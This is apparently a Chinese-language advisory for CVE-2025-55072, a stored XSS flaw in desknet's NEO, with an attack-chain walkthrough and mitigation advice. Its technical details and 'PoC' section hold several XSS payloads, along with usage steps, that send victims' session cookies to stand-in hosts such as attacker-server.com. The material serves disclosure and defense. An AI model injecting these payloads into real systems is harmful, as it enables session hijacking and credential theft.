CVE-2025-55072 desknet's NEO 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-55072

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

desknet's NEO

漏洞概述

CVE-2025-55072是desknet's NEO协同办公软件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由JPCERT/CC的vultures团队发现并报告，CVSS评分为5.4分，属于中危级别漏洞。受影响的版本范围为V2.0R1.0至V9.0R2.0，覆盖了desknet's NEO多个主要版本。

desknet's NEO是日本NEOSYSTEM公司开发的一款企业级协同办公软件套件，广泛应用于日本及全球的政府机关、教育机构和企业中。该软件提供日程管理、邮件收发、文件共享、公告板、工作流等多种功能，是企业内部信息化的重要工具。

存储型XSS漏洞是一种危害较大的Web安全漏洞，攻击者可以将恶意JavaScript代码注入到Web应用程序中，当其他用户访问受影响的页面时，恶意代码会在受害者的浏览器中自动执行。与反射型XSS不同，存储型XSS的恶意代码被持久化保存在服务器端，影响范围更广，危害更为严重。在desknet's NEO中，攻击者可以利用此漏洞在用户浏览器中执行任意JavaScript代码，可能导致会话劫持、敏感信息窃取、权限提升等安全风险。

该漏洞的CVSS向量表明，攻击需要网络访问权限、低权限认证和用户交互，攻击复杂度较低，且会影响其他用户的会话（Scope: Changed），对机密性和完整性造成低影响，但不影响可用性。

技术细节

存储型XSS漏洞的产生原因是Web应用程序对用户输入的数据未进行充分的过滤和转义处理，导致恶意脚本代码被存储到服务器端的数据库中。当其他用户请求包含该恶意数据的页面时，服务器将恶意代码作为正常内容返回给浏览器，浏览器解析执行其中的JavaScript代码，从而触发XSS攻击。

在desknet's NEO中，该漏洞可能存在于以下场景：
1. 公告板或消息发布功能：攻击者发布包含恶意JavaScript代码的公告或消息
2. 日程事件描述：创建日程时在描述字段中注入恶意脚本
3. 文件名或附件信息：上传文件时通过文件名注入恶意代码
4. 用户个人资料或评论功能

攻击利用方式：
1. 攻击者首先需要获取desknet's NEO的有效低权限账户（PR:L）
2. 登录系统后，在存在漏洞的输入字段中提交包含恶意JavaScript的payload，例如：<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
3. 恶意代码被服务器存储到数据库中
4. 当其他用户（受害者）访问包含该内容的页面时，浏览器自动执行恶意脚本
5. 由于漏洞影响范围为Changed（S:C），攻击者可以访问受害者的会话上下文，窃取cookie、会话令牌等敏感信息
6. 攻击者可利用窃取的会话信息冒充受害者执行操作，如读取邮件、修改设置等

该漏洞需要用户交互（UI:R）触发，通常通过诱导受害者点击或访问包含恶意内容的页面实现。

攻击链分析

STEP 1

步骤1：获取初始访问

攻击者通过社会工程学、钓鱼攻击或其他方式获取desknet's NEO系统的有效低权限用户账户凭证。

STEP 2

步骤2：注入恶意Payload

攻击者登录系统后，在存在漏洞的输入字段（如公告板、日程描述、评论等）中提交包含恶意JavaScript代码的存储型XSS payload。

STEP 3

步骤3：恶意代码持久化

由于应用程序未对用户输入进行充分过滤和转义，恶意脚本被存储到服务器端数据库中。

STEP 4

步骤4：诱导受害者访问

攻击者通过内部消息、邮件或其他方式诱导具有更高权限的用户访问包含恶意内容的页面。

STEP 5

步骤5：恶意代码执行

受害者的浏览器加载页面时自动执行恶意JavaScript代码，在受害者的会话上下文中运行（S:C - Scope Changed）。

STEP 6

步骤6：数据窃取与权限提升

恶意代码窃取受害者的会话cookie、令牌等敏感信息，发送至攻击者控制的服务器，攻击者利用这些信息冒充受害者执行进一步操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-55072 - desknet's NEO -->
<!-- This PoC demonstrates a stored XSS payload that can be injected into vulnerable input fields -->

<!-- Basic cookie stealing payload -->
<script>
  var img = new Image();
  img.src = 'http://attacker-server.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

<!-- Alternative payload using fetch API -->
<script>
  fetch('http://attacker-server.com/steal', {
    method: 'POST',
    body: JSON.stringify({cookie: document.cookie, url: window.location.href}),
    headers: {'Content-Type': 'application/json'}
  });
</script>

<!-- Payload using XMLHttpRequest -->
<script>
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://attacker-server.com/steal?c=' + document.cookie, true);
  xhr.send();
</script>

<!-- Event handler based payload (useful if script tags are filtered) -->
<img src=x onerror="fetch('http://attacker-server.com/steal?c='+document.cookie)">

<!-- SVG-based payload -->
<svg/onload="fetch('http://attacker-server.com/steal?c='+document.cookie)">

<!-- Usage instructions:
  1. Set up a listener server at attacker-server.com to capture exfiltrated data
  2. Login to desknet's NEO with a valid low-privilege account
  3. Inject the payload into a vulnerable input field (e.g., bulletin board post, schedule description)
  4. Wait for a victim with higher privileges to view the malicious content
  5. The victim's session cookie will be sent to the attacker's server
-->

影响范围

desknet's NEO V2.0R1.0

desknet's NEO V2.0R1.0 至 V9.0R2.0之间的所有版本

desknet's NEO V9.0R2.0

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）限制普通用户发布包含HTML或JavaScript代码的内容；2）在Web代理或反向代理层面部署XSS过滤规则；3）为所有会话Cookie设置HTTPOnly属性，阻止JavaScript读取；4）加强用户安全意识培训，警惕可疑链接和内容；5）监控异常的网络请求，特别是向外部域名的数据外传行为；6）对管理员和高权限账户实施额外的访问控制和监控。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-55072
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-55072
3 Details https://www.cvedetails.com/cve/CVE-2025-55072/
4 VulDB https://vuldb.com/cve/CVE-2025-55072
5 Link https://jvn.jp/en/jp/JVN90757550/
6 Link https://www.desknets.com/neo/support/mainte/17475/